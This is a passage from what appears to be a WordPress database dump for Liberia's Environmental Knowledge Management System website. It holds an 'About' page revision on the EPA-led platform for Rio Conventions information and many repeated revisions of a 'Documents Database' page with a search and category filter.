sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>','About','','inherit','closed','closed','','68-revision-v1','','','2021-08-17 11:04:23','2021-08-17 11:04:23','',68,'https://ekmsliberia.info/?p=3831',0,'revision','',0),(3834,38,'2021-08-17 12:04:31','2021-08-17 12:04:31','','Document-loop','','publish','closed','closed','','document-loop','','','2021-08-19 12:28:39','2021-08-19 12:28:39','',0,'https://ekmsliberia.info/?post_type=elementor_library&#038;p=3834',0,'elementor_library','',0),(3835,38,'2021-08-17 12:12:13','2021-08-17 12:12:13','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-17 12:12:13','2021-08-17 12:12:13','',3834,'https://ekmsliberia.info/?p=3835',0,'revision','',0),(3836,38,'2021-08-17 12:12:13','2021-08-17 12:12:13','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-17 12:12:13','2021-08-17 12:12:13','',3834,'https://ekmsliberia.info/?p=3836',0,'revision','',0),(3837,38,'2021-08-17 12:15:19','2021-08-17 12:15:19','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-17 12:15:19','2021-08-17 12:15:19','',3834,'https://ekmsliberia.info/?p=3837',0,'revision','',0),(3839,38,'2021-08-17 12:28:52','2021-08-17 12:28:52','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 12:28:52','2021-08-17 12:28:52','',91,'https://ekmsliberia.info/?p=3839',0,'revision','',0),(3840,38,'2021-08-17 12:28:52','2021-08-17 12:28:52','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 12:28:52','2021-08-17 12:28:52','',91,'https://ekmsliberia.info/?p=3840',0,'revision','',0),(3841,38,'2021-08-17 12:28:53','2021-08-17 12:28:53','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 12:28:53','2021-08-17 12:28:53','',91,'https://ekmsliberia.info/?p=3841',0,'revision','',0),(3842,38,'2021-08-17 12:31:16','2021-08-17 12:31:16','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-17 12:31:16','2021-08-17 12:31:16','',3834,'https://ekmsliberia.info/?p=3842',0,'revision','',0),(3843,38,'2021-08-17 12:33:12','2021-08-17 12:33:12','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-17 12:33:12','2021-08-17 12:33:12','',3834,'https://ekmsliberia.info/?p=3843',0,'revision','',0),(3844,38,'2021-08-17 12:43:36','2021-08-17 12:43:36','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-17 12:43:36','2021-08-17 12:43:36','',3834,'https://ekmsliberia.info/?p=3844',0,'revision','',0),(3845,38,'2021-08-17 13:03:51','2021-08-17 13:03:51','','Document-loop','','inherit','closed','closed','','3834-revision-v1','','','2021-08-17 13:03:51','2021-08-17 13:03:51','',3834,'https://ekmsliberia.info/?p=3845',0,'revision','',0),(3850,38,'2021-08-17 13:36:47','2021-08-17 13:36:47','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:36:47','2021-08-17 13:36:47','',91,'https://ekmsliberia.info/?p=3850',0,'revision','',0),(3851,38,'2021-08-17 13:36:47','2021-08-17 13:36:47','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:36:47','2021-08-17 13:36:47','',91,'https://ekmsliberia.info/?p=3851',0,'revision','',0),(3852,38,'2021-08-17 13:36:47','2021-08-17 13:36:47','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:36:47','2021-08-17 13:36:47','',91,'https://ekmsliberia.info/?p=3852',0,'revision','',0),(3853,38,'2021-08-17 13:38:20','2021-08-17 13:38:20','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:38:20','2021-08-17 13:38:20','',91,'https://ekmsliberia.info/?p=3853',0,'revision','',0),(3854,38,'2021-08-17 13:38:20','2021-08-17 13:38:20','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:38:20','2021-08-17 13:38:20','',91,'https://ekmsliberia.info/?p=3854',0,'revision','',0),(3855,38,'2021-08-17 13:38:21','2021-08-17 13:38:21','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:38:21','2021-08-17 13:38:21','',91,'https://ekmsliberia.info/?p=3855',0,'revision','',0),(3857,38,'2021-08-17 13:39:39','2021-08-17 13:39:39','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:39:39','2021-08-17 13:39:39','',91,'https://ekmsliberia.info/?p=3857',0,'revision','',0),(3858,38,'2021-08-17 13:39:39','2021-08-17 13:39:39','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:39:39','2021-08-17 13:39:39','',91,'https://ekmsliberia.info/?p=3858',0,'revision','',0),(3859,38,'2021-08-17 13:39:39','2021-08-17 13:39:39','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:39:39','2021-08-17 13:39:39','',91,'https://ekmsliberia.info/?p=3859',0,'revision','',0),(3861,38,'2021-08-17 13:48:32','2021-08-17 13:48:32','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:48:32','2021-08-17 13:48:32','',91,'https://ekmsliberia.info/?p=3861',0,'revision','',0),(3862,38,'2021-08-17 13:48:33','2021-08-17 13:48:33','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:48:33','2021-08-17 13:48:33','',91,'https://ekmsliberia.info/?p=3862',0,'revision','',0),(3863,38,'2021-08-17 13:48:33','2021-08-17 13:48:33','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]		\n			search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search for document...\"\n		>\n		<select\n			class=\"jet-select__control\"\n			name=\"resource_category\"\n		>\n					<option\n				value=\"\"\n				data-label=\"Select...\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Select...</option>\n						<option\n				value=\"76\"\n				data-label=\"Case Studies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Case Studies</option>\n						<option\n				value=\"78\"\n				data-label=\"Conventions\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Conventions</option>\n						<option\n				value=\"79\"\n				data-label=\"Factsheets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Factsheets</option>\n						<option\n				value=\"161\"\n				data-label=\"Guidelines\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Guidelines</option>\n						<option\n				value=\"82\"\n				data-label=\"Leaflets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Leaflets</option>\n						<option\n				value=\"84\"\n				data-label=\"Newsletters\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Newsletters</option>\n						<option\n				value=\"85\"\n				data-label=\"Policies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Policies</option>\n						<option\n				value=\"225\"\n				data-label=\"Presentations\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Presentations</option>\n						<option\n				value=\"209\"\n				data-label=\"Project Document\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Project Document</option>\n						<option\n				value=\"86\"\n				data-label=\"Reports\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Reports</option>\n						<option\n				value=\"178\"\n				data-label=\"Research\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Research</option>\n						<option\n				value=\"88\"\n				data-label=\"Strategy and Action Plans\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Strategy and Action Plans</option>\n						<option\n				value=\"89\"\n				data-label=\"Toolkits\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Toolkits</option>\n			</select>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:48:33','2021-08-17 13:48:33','',91,'https://ekmsliberia.info/?p=3863',0,'revision','',0),(3865,38,'2021-08-17 13:55:06','2021-08-17 13:55:06','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]		\n			search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search for document...\"\n		>\n		<select\n			class=\"jet-select__control\"\n			name=\"resource_category\"\n		>\n					<option\n				value=\"\"\n				data-label=\"Select...\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Select...</option>\n						<option\n				value=\"76\"\n				data-label=\"Case Studies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Case Studies</option>\n						<option\n				value=\"78\"\n				data-label=\"Conventions\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Conventions</option>\n						<option\n				value=\"79\"\n				data-label=\"Factsheets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Factsheets</option>\n						<option\n				value=\"161\"\n				data-label=\"Guidelines\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Guidelines</option>\n						<option\n				value=\"82\"\n				data-label=\"Leaflets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Leaflets</option>\n						<option\n				value=\"84\"\n				data-label=\"Newsletters\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Newsletters</option>\n						<option\n				value=\"85\"\n				data-label=\"Policies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Policies</option>\n						<option\n				value=\"225\"\n				data-label=\"Presentations\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Presentations</option>\n						<option\n				value=\"209\"\n				data-label=\"Project Document\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Project Document</option>\n						<option\n				value=\"86\"\n				data-label=\"Reports\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Reports</option>\n						<option\n				value=\"178\"\n				data-label=\"Research\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Research</option>\n						<option\n				value=\"88\"\n				data-label=\"Strategy and Action Plans\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Strategy and Action Plans</option>\n						<option\n				value=\"89\"\n				data-label=\"Toolkits\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Toolkits</option>\n			</select>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:55:06','2021-08-17 13:55:06','',91,'https://ekmsliberia.info/?p=3865',0,'revision','',0),(3866,38,'2021-08-17 13:55:06','2021-08-17 13:55:06','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]		\n			search\n		<input\n			class=\"jet-search-filter__input\"\n			type=\"search\"\n			autocomplete=\"off\"\n			name=\"query\"\n			value=\"\"\n			placeholder=\"Search for document...\"\n		>\n		<select\n			class=\"jet-select__control\"\n			name=\"resource_category\"\n		>\n					<option\n				value=\"\"\n				data-label=\"Select...\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Select...</option>\n						<option\n				value=\"76\"\n				data-label=\"Case Studies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Case Studies</option>\n						<option\n				value=\"78\"\n				data-label=\"Conventions\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Conventions</option>\n						<option\n				value=\"79\"\n				data-label=\"Factsheets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Factsheets</option>\n						<option\n				value=\"161\"\n				data-label=\"Guidelines\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Guidelines</option>\n						<option\n				value=\"82\"\n				data-label=\"Leaflets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Leaflets</option>\n						<option\n				value=\"84\"\n				data-label=\"Newsletters\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Newsletters</option>\n						<option\n				value=\"85\"\n				data-label=\"Policies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Policies</option>\n						<option\n				value=\"225\"\n				data-label=\"Presentations\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Presentations</option>\n						<option\n				value=\"209\"\n				data-label=\"Project Document\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Project Document</option>\n						<option\n				value=\"86\"\n				data-label=\"Reports\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Reports</option>\n						<option\n				value=\"178\"\n				data-label=\"Research\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Research</option>\n						<option\n				value=\"88\"\n				data-label=\"Strategy and Action Plans\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Strategy and Action Plans</option>\n						<option\n				value=\"89\"\n				data-label=\"Toolkits\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Toolkits</option>\n			</select>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:55:06','2021-08-17 13:55:06','',91,'https://ekmsliberia.info/?p=3866',0,'revision','',0),(3867,38,'2021-08-17 13:55:07','2021-08-17 13:55:07','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]		\n			Select Filter\n		<select\n			class=\"jet-select__control\"\n			name=\"resource_category\"\n		>\n					<option\n				value=\"\"\n				data-label=\"Select...\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Select...</option>\n						<option\n				value=\"76\"\n				data-label=\"Case Studies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Case Studies</option>\n						<option\n				value=\"78\"\n				data-label=\"Conventions\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Conventions</option>\n						<option\n				value=\"79\"\n				data-label=\"Factsheets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Factsheets</option>\n						<option\n				value=\"161\"\n				data-label=\"Guidelines\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Guidelines</option>\n						<option\n				value=\"82\"\n				data-label=\"Leaflets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Leaflets</option>\n						<option\n				value=\"84\"\n				data-label=\"Newsletters\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Newsletters</option>\n						<option\n				value=\"85\"\n				data-label=\"Policies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Policies</option>\n						<option\n				value=\"225\"\n				data-label=\"Presentations\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Presentations</option>\n						<option\n				value=\"209\"\n				data-label=\"Project Document\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Project Document</option>\n						<option\n				value=\"86\"\n				data-label=\"Reports\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Reports</option>\n						<option\n				value=\"178\"\n				data-label=\"Research\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Research</option>\n						<option\n				value=\"88\"\n				data-label=\"Strategy and Action Plans\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Strategy and Action Plans</option>\n						<option\n				value=\"89\"\n				data-label=\"Toolkits\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Toolkits</option>\n			</select>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:55:07','2021-08-17 13:55:07','',91,'https://ekmsliberia.info/?p=3867',0,'revision','',0),(3868,38,'2021-08-17 13:58:08','2021-08-17 13:58:08','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]		\n			Select Filter\n		<select\n			class=\"jet-select__control\"\n			name=\"resource_category\"\n		>\n					<option\n				value=\"\"\n				data-label=\"Select...\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Select...</option>\n						<option\n				value=\"76\"\n				data-label=\"Case Studies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Case Studies</option>\n						<option\n				value=\"78\"\n				data-label=\"Conventions\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Conventions</option>\n						<option\n				value=\"79\"\n				data-label=\"Factsheets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Factsheets</option>\n						<option\n				value=\"161\"\n				data-label=\"Guidelines\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Guidelines</option>\n						<option\n				value=\"82\"\n				data-label=\"Leaflets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Leaflets</option>\n						<option\n				value=\"84\"\n				data-label=\"Newsletters\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Newsletters</option>\n						<option\n				value=\"85\"\n				data-label=\"Policies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Policies</option>\n						<option\n				value=\"225\"\n				data-label=\"Presentations\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Presentations</option>\n						<option\n				value=\"209\"\n				data-label=\"Project Document\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Project Document</option>\n						<option\n				value=\"86\"\n				data-label=\"Reports\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Reports</option>\n						<option\n				value=\"178\"\n				data-label=\"Research\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Research</option>\n						<option\n				value=\"88\"\n				data-label=\"Strategy and Action Plans\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Strategy and Action Plans</option>\n						<option\n				value=\"89\"\n				data-label=\"Toolkits\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Toolkits</option>\n			</select>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:58:08','2021-08-17 13:58:08','',91,'https://ekmsliberia.info/?p=3868',0,'revision','',0),(3869,38,'2021-08-17 13:58:08','2021-08-17 13:58:08','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]		\n			Select Filter\n		<select\n			class=\"jet-select__control\"\n			name=\"resource_category\"\n		>\n					<option\n				value=\"\"\n				data-label=\"Select...\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Select...</option>\n						<option\n				value=\"76\"\n				data-label=\"Case Studies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Case Studies</option>\n						<option\n				value=\"78\"\n				data-label=\"Conventions\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Conventions</option>\n						<option\n				value=\"79\"\n				data-label=\"Factsheets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Factsheets</option>\n						<option\n				value=\"161\"\n				data-label=\"Guidelines\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Guidelines</option>\n						<option\n				value=\"82\"\n				data-label=\"Leaflets\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Leaflets</option>\n						<option\n				value=\"84\"\n				data-label=\"Newsletters\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Newsletters</option>\n						<option\n				value=\"85\"\n				data-label=\"Policies\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Policies</option>\n						<option\n				value=\"225\"\n				data-label=\"Presentations\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Presentations</option>\n						<option\n				value=\"209\"\n				data-label=\"Project Document\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Project Document</option>\n						<option\n				value=\"86\"\n				data-label=\"Reports\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Reports</option>\n						<option\n				value=\"178\"\n				data-label=\"Research\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Research</option>\n						<option\n				value=\"88\"\n				data-label=\"Strategy and Action Plans\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Strategy and Action Plans</option>\n						<option\n				value=\"89\"\n				data-label=\"Toolkits\"\n				data-counter-prefix=\"(\"\n				data-counter-suffix=\")\"\n							>Toolkits</option>\n			</select>','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:58:08','2021-08-17 13:58:08','',91,'https://ekmsliberia.info/?p=3869',0,'revision','',0),(3870,38,'2021-08-17 13:58:08','2021-08-17 13:58:08','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 13:58:08','2021-08-17 13:58:08','',91,'https://ekmsliberia.info/?p=3870',0,'revision','',0),(3871,38,'2021-08-17 14:13:02','2021-08-17 14:13:02','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 14:13:02','2021-08-17 14:13:02','',91,'https://ekmsliberia.info/?p=3871',0,'revision','',0),(3872,38,'2021-08-17 14:13:02','2021-08-17 14:13:02','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 14:13:02','2021-08-17 14:13:02','',91,'https://ekmsliberia.info/?p=3872',0,'revision','',0),(3873,38,'2021-08-17 14:13:02','2021-08-17 14:13:02','<h2>Access environmental reports, publications, policies and other related documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,cf:download_link,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"auto,250px,400px,auto,auto,auto\" page_length=\"false\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2021-08-17 14:13:02','2021-08-17 14:13:02','',91,'https://ekmsliberia.info/?p=3873',0,'revision','',0),(3874,38,'2021-08-17 14:16:17','2021-08-17 